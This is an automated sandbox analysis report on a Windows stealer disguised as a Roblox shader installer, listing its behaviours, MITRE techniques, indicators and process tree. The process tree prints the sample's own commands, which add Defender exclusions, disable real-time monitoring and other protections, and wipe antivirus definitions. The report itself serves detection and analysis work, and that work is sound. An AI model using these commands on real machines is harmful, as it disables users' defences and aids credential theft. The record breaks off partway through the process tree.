3ace6ddd732b38486b1c5a5bdc4a375fc3a1badef418ff0cfe7b3d22abdeb55d

Analysis

max time kernel
17s
max time network
18s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
16-12-2024 11:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

robloxshader..beta.exe
Size

10.7MB
MD5

f5fb458a66475987f683686945915d04
SHA1

9ff6805979da9eca9b1ccea40a1ad101e4959c91
SHA256

3ace6ddd732b38486b1c5a5bdc4a375fc3a1badef418ff0cfe7b3d22abdeb55d
SHA512

dfc3928198d287214375bc0fcf2bf2e85b8077dac8a2f799bf12665dbcdbe8ff8dc57a5066c7100781d4706d4379d1ef57a708e2e6c31c928050413363bd7fb7
SSDEEP

196608:M2PV1vAX4/tgSlJA642VJcSqm3/i3B6ylnlPzf+JiJCsmFMvln6hqg7:VAolgSDWadQBRlnlPSa7mmvlpg7

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
888	powershell.exe
2872	powershell.exe
388	powershell.exe
3868	powershell.exe
3520	powershell.exe
3408	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4836	cmd.exe
4676	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4884	bound.exe
1176	setup.exe
1640	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe
2696	robloxshader..beta.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
6	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1328	tasklist.exe
1992	tasklist.exe
4924	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab5a-22.dat	upx
behavioral1/memory/2696-26-0x00007FFBE9CF0000-0x00007FFBEA2DA000-memory.dmp	upx
behavioral1/files/0x001a00000002ab3e-28.dat	upx
behavioral1/memory/2696-31-0x00007FFBF3E10000-0x00007FFBF3E33000-memory.dmp	upx
behavioral1/files/0x001c00000002ab55-30.dat	upx
behavioral1/memory/2696-33-0x00007FFBF3E50000-0x00007FFBF3E5F000-memory.dmp	upx
behavioral1/files/0x001900000002ab4e-50.dat	upx
behavioral1/files/0x001900000002ab4b-49.dat	upx
behavioral1/files/0x001900000002ab4a-48.dat	upx
behavioral1/files/0x001c00000002ab49-47.dat	upx
behavioral1/files/0x001900000002ab48-46.dat	upx
behavioral1/files/0x001900000002ab45-45.dat	upx
behavioral1/files/0x001900000002ab44-44.dat	upx
behavioral1/files/0x001b00000002ab33-43.dat	upx
behavioral1/files/0x001c00000002ab61-42.dat	upx
behavioral1/files/0x001900000002ab60-41.dat	upx
behavioral1/files/0x001900000002ab5d-40.dat	upx
behavioral1/files/0x001900000002ab57-37.dat	upx
behavioral1/files/0x001900000002ab54-36.dat	upx
behavioral1/memory/2696-56-0x00007FFBF3D70000-0x00007FFBF3D9D000-memory.dmp	upx
behavioral1/memory/2696-58-0x00007FFBF3DC0000-0x00007FFBF3DD9000-memory.dmp	upx
behavioral1/memory/2696-60-0x00007FFBEE450000-0x00007FFBEE473000-memory.dmp	upx
behavioral1/memory/2696-62-0x00007FFBE9B80000-0x00007FFBE9CEF000-memory.dmp	upx
behavioral1/memory/2696-64-0x00007FFBEFB00000-0x00007FFBEFB19000-memory.dmp	upx
behavioral1/memory/2696-66-0x00007FFBF3B90000-0x00007FFBF3B9D000-memory.dmp	upx
behavioral1/memory/2696-68-0x00007FFBEE420000-0x00007FFBEE44E000-memory.dmp	upx
behavioral1/memory/2696-71-0x00007FFBE9CF0000-0x00007FFBEA2DA000-memory.dmp	upx
behavioral1/memory/2696-72-0x00007FFBE84A0000-0x00007FFBE8815000-memory.dmp	upx
behavioral1/memory/2696-74-0x00007FFBF3E10000-0x00007FFBF3E33000-memory.dmp	upx
behavioral1/memory/2696-76-0x00007FFBEF980000-0x00007FFBEF994000-memory.dmp	upx
behavioral1/memory/2696-73-0x00007FFBE9AC0000-0x00007FFBE9B78000-memory.dmp	upx
behavioral1/memory/2696-78-0x00007FFBEE540000-0x00007FFBEE54D000-memory.dmp	upx
behavioral1/memory/2696-83-0x00007FFBE99A0000-0x00007FFBE9ABC000-memory.dmp	upx
behavioral1/memory/2696-120-0x00007FFBEE450000-0x00007FFBEE473000-memory.dmp	upx
behavioral1/memory/2696-171-0x00007FFBE9B80000-0x00007FFBE9CEF000-memory.dmp	upx
behavioral1/memory/2696-190-0x00007FFBEFB00000-0x00007FFBEFB19000-memory.dmp	upx
behavioral1/memory/2696-285-0x00007FFBEE420000-0x00007FFBEE44E000-memory.dmp	upx
behavioral1/memory/2696-437-0x00007FFBE84A0000-0x00007FFBE8815000-memory.dmp	upx
behavioral1/memory/2696-453-0x00007FFBE9AC0000-0x00007FFBE9B78000-memory.dmp	upx
behavioral1/memory/2696-456-0x00007FFBF3E10000-0x00007FFBF3E33000-memory.dmp	upx
behavioral1/memory/2696-461-0x00007FFBE9B80000-0x00007FFBE9CEF000-memory.dmp	upx
behavioral1/memory/2696-455-0x00007FFBE9CF0000-0x00007FFBEA2DA000-memory.dmp	upx
behavioral1/memory/2696-501-0x00007FFBEE540000-0x00007FFBEE54D000-memory.dmp	upx
behavioral1/memory/2696-500-0x00007FFBEF980000-0x00007FFBEF994000-memory.dmp	upx
behavioral1/memory/2696-488-0x00007FFBE9CF0000-0x00007FFBEA2DA000-memory.dmp	upx
behavioral1/memory/2696-513-0x00007FFBE84A0000-0x00007FFBE8815000-memory.dmp	upx
behavioral1/memory/2696-512-0x00007FFBEE420000-0x00007FFBEE44E000-memory.dmp	upx
behavioral1/memory/2696-511-0x00007FFBF3B90000-0x00007FFBF3B9D000-memory.dmp	upx
behavioral1/memory/2696-510-0x00007FFBEFB00000-0x00007FFBEFB19000-memory.dmp	upx
behavioral1/memory/2696-509-0x00007FFBE9B80000-0x00007FFBE9CEF000-memory.dmp	upx
behavioral1/memory/2696-508-0x00007FFBEE450000-0x00007FFBEE473000-memory.dmp	upx
behavioral1/memory/2696-507-0x00007FFBF3DC0000-0x00007FFBF3DD9000-memory.dmp	upx
behavioral1/memory/2696-506-0x00007FFBF3D70000-0x00007FFBF3D9D000-memory.dmp	upx
behavioral1/memory/2696-505-0x00007FFBF3E50000-0x00007FFBF3E5F000-memory.dmp	upx
behavioral1/memory/2696-504-0x00007FFBF3E10000-0x00007FFBF3E33000-memory.dmp	upx
behavioral1/memory/2696-503-0x00007FFBE9AC0000-0x00007FFBE9B78000-memory.dmp	upx
behavioral1/memory/2696-502-0x00007FFBE99A0000-0x00007FFBE9ABC000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Bloxshade\setup.exe	bound.exe
File created	C:\Program Files\Bloxshade\installer.exe	bound.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1844	msedgewebview2.exe
1064	msedgewebview2.exe
1876	msedgewebview2.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3896	cmd.exe
4612	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2548	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedgewebview2.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1220	systeminfo.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4564	taskkill.exe
2804	taskkill.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
3868	powershell.exe
2872	powershell.exe
888	powershell.exe
388	powershell.exe
2872	powershell.exe
3868	powershell.exe
3868	powershell.exe
388	powershell.exe
388	powershell.exe
888	powershell.exe
888	powershell.exe
4676	powershell.exe
4676	powershell.exe
2088	powershell.exe
2088	powershell.exe
4676	powershell.exe
2088	powershell.exe
844	msedgewebview2.exe
844	msedgewebview2.exe
3520	powershell.exe
3520	powershell.exe
4824	powershell.exe
4824	powershell.exe
3408	powershell.exe
3408	powershell.exe
1828	powershell.exe
1828	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs

pid	Process
4616	msedgewebview2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	1328	tasklist.exe
Token: SeDebugPrivilege	1992	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3668	WMIC.exe
Token: SeSecurityPrivilege	3668	WMIC.exe
Token: SeTakeOwnershipPrivilege	3668	WMIC.exe
Token: SeLoadDriverPrivilege	3668	WMIC.exe
Token: SeSystemProfilePrivilege	3668	WMIC.exe
Token: SeSystemtimePrivilege	3668	WMIC.exe
Token: SeProfSingleProcessPrivilege	3668	WMIC.exe
Token: SeIncBasePriorityPrivilege	3668	WMIC.exe
Token: SeCreatePagefilePrivilege	3668	WMIC.exe
Token: SeBackupPrivilege	3668	WMIC.exe
Token: SeRestorePrivilege	3668	WMIC.exe
Token: SeShutdownPrivilege	3668	WMIC.exe
Token: SeDebugPrivilege	3668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3668	WMIC.exe
Token: SeRemoteShutdownPrivilege	3668	WMIC.exe
Token: SeUndockPrivilege	3668	WMIC.exe
Token: SeManageVolumePrivilege	3668	WMIC.exe
Token: 33	3668	WMIC.exe
Token: 34	3668	WMIC.exe
Token: 35	3668	WMIC.exe
Token: 36	3668	WMIC.exe
Token: SeDebugPrivilege	4924	tasklist.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	4564	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3668	WMIC.exe
Token: SeSecurityPrivilege	3668	WMIC.exe
Token: SeTakeOwnershipPrivilege	3668	WMIC.exe
Token: SeLoadDriverPrivilege	3668	WMIC.exe
Token: SeSystemProfilePrivilege	3668	WMIC.exe
Token: SeSystemtimePrivilege	3668	WMIC.exe
Token: SeProfSingleProcessPrivilege	3668	WMIC.exe
Token: SeIncBasePriorityPrivilege	3668	WMIC.exe
Token: SeCreatePagefilePrivilege	3668	WMIC.exe
Token: SeBackupPrivilege	3668	WMIC.exe
Token: SeRestorePrivilege	3668	WMIC.exe
Token: SeShutdownPrivilege	3668	WMIC.exe
Token: SeDebugPrivilege	3668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3668	WMIC.exe
Token: SeRemoteShutdownPrivilege	3668	WMIC.exe
Token: SeUndockPrivilege	3668	WMIC.exe
Token: SeManageVolumePrivilege	3668	WMIC.exe
Token: 33	3668	WMIC.exe
Token: 34	3668	WMIC.exe
Token: 35	3668	WMIC.exe
Token: 36	3668	WMIC.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	2804	taskkill.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeIncreaseQuotaPrivilege	4220	WMIC.exe
Token: SeSecurityPrivilege	4220	WMIC.exe
Token: SeTakeOwnershipPrivilege	4220	WMIC.exe
Token: SeLoadDriverPrivilege	4220	WMIC.exe
Token: SeSystemProfilePrivilege	4220	WMIC.exe
Token: SeSystemtimePrivilege	4220	WMIC.exe
Token: SeProfSingleProcessPrivilege	4220	WMIC.exe
Token: SeIncBasePriorityPrivilege	4220	WMIC.exe
Token: SeCreatePagefilePrivilege	4220	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1176	setup.exe
4616	msedgewebview2.exe
4616	msedgewebview2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3864 wrote to memory of 2696	3864	robloxshader..beta.exe	77
PID 3864 wrote to memory of 2696	3864	robloxshader..beta.exe	77
PID 2696 wrote to memory of 1152	2696	robloxshader..beta.exe	78
PID 2696 wrote to memory of 1152	2696	robloxshader..beta.exe	78
PID 2696 wrote to memory of 5084	2696	robloxshader..beta.exe	79
PID 2696 wrote to memory of 5084	2696	robloxshader..beta.exe	79
PID 2696 wrote to memory of 1108	2696	robloxshader..beta.exe	82
PID 2696 wrote to memory of 1108	2696	robloxshader..beta.exe	82
PID 2696 wrote to memory of 4920	2696	robloxshader..beta.exe	83
PID 2696 wrote to memory of 4920	2696	robloxshader..beta.exe	83
PID 2696 wrote to memory of 4224	2696	robloxshader..beta.exe	84
PID 2696 wrote to memory of 4224	2696	robloxshader..beta.exe	84
PID 5084 wrote to memory of 3868	5084	cmd.exe	88
PID 5084 wrote to memory of 3868	5084	cmd.exe	88
PID 1152 wrote to memory of 2872	1152	cmd.exe	89
PID 1152 wrote to memory of 2872	1152	cmd.exe	89
PID 1108 wrote to memory of 388	1108	cmd.exe	90
PID 1108 wrote to memory of 388	1108	cmd.exe	90
PID 4224 wrote to memory of 888	4224	cmd.exe	91
PID 4224 wrote to memory of 888	4224	cmd.exe	91
PID 2696 wrote to memory of 2276	2696	robloxshader..beta.exe	92
PID 2696 wrote to memory of 2276	2696	robloxshader..beta.exe	92
PID 2696 wrote to memory of 1240	2696	robloxshader..beta.exe	93
PID 2696 wrote to memory of 1240	2696	robloxshader..beta.exe	93
PID 4920 wrote to memory of 4884	4920	cmd.exe	95
PID 4920 wrote to memory of 4884	4920	cmd.exe	95
PID 4884 wrote to memory of 2024	4884	bound.exe	97
PID 4884 wrote to memory of 2024	4884	bound.exe	97
PID 1240 wrote to memory of 1328	1240	cmd.exe	99
PID 1240 wrote to memory of 1328	1240	cmd.exe	99
PID 2696 wrote to memory of 4752	2696	robloxshader..beta.exe	100
PID 2696 wrote to memory of 4752	2696	robloxshader..beta.exe	100
PID 2696 wrote to memory of 4836	2696	robloxshader..beta.exe	101
PID 2696 wrote to memory of 4836	2696	robloxshader..beta.exe	101
PID 2696 wrote to memory of 4060	2696	robloxshader..beta.exe	103
PID 2696 wrote to memory of 4060	2696	robloxshader..beta.exe	103
PID 2276 wrote to memory of 1992	2276	cmd.exe	105
PID 2276 wrote to memory of 1992	2276	cmd.exe	105
PID 2696 wrote to memory of 4740	2696	robloxshader..beta.exe	107
PID 2696 wrote to memory of 4740	2696	robloxshader..beta.exe	107
PID 2696 wrote to memory of 3896	2696	robloxshader..beta.exe	108
PID 2696 wrote to memory of 3896	2696	robloxshader..beta.exe	108
PID 2696 wrote to memory of 5044	2696	robloxshader..beta.exe	110
PID 2696 wrote to memory of 5044	2696	robloxshader..beta.exe	110
PID 2696 wrote to memory of 944	2696	robloxshader..beta.exe	113
PID 2696 wrote to memory of 944	2696	robloxshader..beta.exe	113
PID 4836 wrote to memory of 4676	4836	cmd.exe	116
PID 4836 wrote to memory of 4676	4836	cmd.exe	116
PID 4752 wrote to memory of 3668	4752	cmd.exe	117
PID 4752 wrote to memory of 3668	4752	cmd.exe	117
PID 4060 wrote to memory of 4924	4060	cmd.exe	118
PID 4060 wrote to memory of 4924	4060	cmd.exe	118
PID 2024 wrote to memory of 4564	2024	cmd.exe	119
PID 2024 wrote to memory of 4564	2024	cmd.exe	119
PID 3896 wrote to memory of 4612	3896	cmd.exe	147
PID 3896 wrote to memory of 4612	3896	cmd.exe	147
PID 4740 wrote to memory of 792	4740	cmd.exe	121
PID 4740 wrote to memory of 792	4740	cmd.exe	121
PID 944 wrote to memory of 2088	944	cmd.exe	122
PID 944 wrote to memory of 2088	944	cmd.exe	122
PID 5044 wrote to memory of 1220	5044	cmd.exe	123
PID 5044 wrote to memory of 1220	5044	cmd.exe	123
PID 2696 wrote to memory of 1508	2696	robloxshader..beta.exe	124
PID 2696 wrote to memory of 1508	2696	robloxshader..beta.exe	124

C:\Users\Admin\AppData\Local\Temp\robloxshader..beta.exe
"C:\Users\Admin\AppData\Local\Temp\robloxshader..beta.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3864
- C:\Users\Admin\AppData\Local\Temp\robloxshader..beta.exe
  "C:\Users\Admin\AppData\Local\Temp\robloxshader..beta.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\robloxshader..beta.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\robloxshader..beta.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious use of WriteProcessMemory
      PID:4884
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill /F /IM installer.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2024
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM installer.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4564
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c taskkill /F /IM setup.exe
        5⤵
        
        PID:4904
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM setup.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2804
    - - C:\Program Files\Bloxshade\setup.exe
        
        "C:\Program Files\Bloxshade\setup.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:1176
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=setup.exe --webview-exe-version=2.8.11 --user-data-dir="C:\Users\Admin\AppData\Local\com.bloxshade.tauri\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-features=msWebOOUI,msPdfOOUI,msSmartScreenProtection --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --lang=en-US --mojo-named-platform-channel-pipe=1176.3128.7155433754623525755
        6⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:4616
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\com.bloxshade.tauri\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\com.bloxshade.tauri\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\com.bloxshade.tauri\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1c0,0x7ffbd2423cb8,0x7ffbd2423cc8,0x7ffbd2423cd8
        7⤵
        
        PID:2232
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1716,6903082480245024986,4041687298655312318,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msPdfOOUI,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSmartScreenProtection,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch,msWebOOUI --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\com.bloxshade.tauri\EBWebView" --webview-exe-name=setup.exe --webview-exe-version=2.8.11 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1780 /prefetch:2
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1844
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,6903082480245024986,4041687298655312318,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msPdfOOUI,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSmartScreenProtection,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch,msWebOOUI --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\com.bloxshade.tauri\EBWebView" --webview-exe-name=setup.exe --webview-exe-version=2.8.11 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2012 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:844
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1716,6903082480245024986,4041687298655312318,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msPdfOOUI,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSmartScreenProtection,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch,msWebOOUI --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\com.bloxshade.tauri\EBWebView" --webview-exe-name=setup.exe --webview-exe-version=2.8.11 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2004 /prefetch:8
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1064
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
